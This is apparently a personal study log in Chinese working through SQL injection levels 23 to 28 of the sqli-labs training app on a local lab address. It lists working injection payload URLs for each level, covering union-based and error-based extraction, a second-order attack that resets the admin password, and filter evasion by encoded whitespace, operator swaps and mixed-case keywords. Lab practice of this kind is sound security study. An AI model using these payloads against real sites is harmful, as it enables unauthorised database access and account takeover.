【20171101早】sqli-libs Less 23-28
Less 23:
題目:
分析:payload:http://192.168.162.135/sqli-libs/Less-23/?id=-1‘ union select 1, @@version, 3--+ 失敗,應該是對--+進行了過濾,因此修改為
payload:http://192.168.162.135/sqli-libs/Less-23/?id=-1‘ union select 1, @@version, ‘3 去掉--+,改成 ‘3 進行閉合sql中的 ‘
Less 24:
題目:
分析:存儲型註入,先將admin‘#用戶insert 數據庫中,然後在重新更新admin的密碼,就將
TRY:
s1:點擊New User click here,註冊 admin‘# 用戶,密碼是222
s2:查看下數據庫,admin‘#已經存在
s3:登陸系統,修改admin的密碼為111
s4:查看到底修改的是admin‘#用戶的密碼,還是admin的密碼?!!!
修改的是admin的密碼,這樣我們就可以用admin登陸系統了。OK!
Less 25:
題目:
分析:對 and 和 or 的過濾,這時用到的是替換
add <=> &&
or <=> ||
TRY:
payload: http://192.168.162.135/sqli-libs/Less-25/?id=1‘ || extractvalue(1, concat(0x7e, database()))--+
效果:錯誤日誌中暴露出數據庫的名字,其他信息類似此方式!
Less 25a:
分析:和Less 25不同的是閉合方式,不需要加 ‘
TRY:
payload: http://192.168.162.135/sqli-libs/Less-25a/?id=-1 union select 1,@@version,3--+
Less 26:
題目:
分析:空格和註釋會被過濾,這裏用到替換的技巧。URL編碼表
TRY:
payload: http://192.168.162.135/sqli-libs/Less-26/?id=100‘ union%0bselect%a01,@@version,3||‘1
效果:
Less 26a:
類似 Less 26,閉合方式變為 ‘)
payload: http://192.168.162.135/sqli-libs/Less-26a/?id=100‘) union%0bselect%a01,@@version,3||(‘1
Less 27:
題目:
分析:union,select字符和less26中的字符都被過濾,這題可以將union改成uNioN,select改成sElEct
TRY:
payload: http://192.168.162.135/sqli-libs/Less-27/?id=100‘ uNioN%0bsElEct%a01,user(),3||‘1
效果:
Less 27a:
分析:閉合方式變為 "
payload: http://192.168.162.135/sqli-libs/Less-27a/?id=100" uNioN%0bsElEct%a01,user(),3||"1
Less 28:
分析:閉合方式變為 ‘)
payload: http://192.168.162.135/sqli-libs/Less-28/?id=100‘) uNioN%0bsElEct%a01,user(),3||(‘1
【20171101早】sqli-libs Less 23-28